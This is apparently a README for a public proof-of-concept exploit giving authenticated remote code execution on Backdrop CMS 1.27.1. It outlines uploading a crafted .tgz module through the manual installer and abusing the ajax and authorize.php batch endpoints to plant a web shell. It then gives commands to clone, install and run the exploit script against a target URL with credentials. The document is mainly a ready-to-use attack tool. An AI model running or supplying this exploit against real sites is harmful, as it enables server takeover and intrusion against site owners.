Backdrop CMS version 1.27.1 is vulnerable to authenticated remote code execution.
A user with installer privileges can upload a crafted module installation like,.tgz file via the manual project installer, which is then extracted and executed as PHP code.
The exploitation flow abuses the ajax and authorize.php batch endpoints to trigger a file write under /modules/<name>/, leading to web shell access.
git clone https://github.com/rvizx/backdrop-rce
cd backdrop-rce
python3 -m venv venv && source venv/bin/activate
pip install -r requirements.txt
# usage
python3 exploit.py <url> <username> <password>Example:
python3 exploit.py http://example.com rvz frm2XS42E@x23${!@3;xOriginal PoC Exploit Link (ExploitDB) - Author: Ahmet Ümit BAYRAM

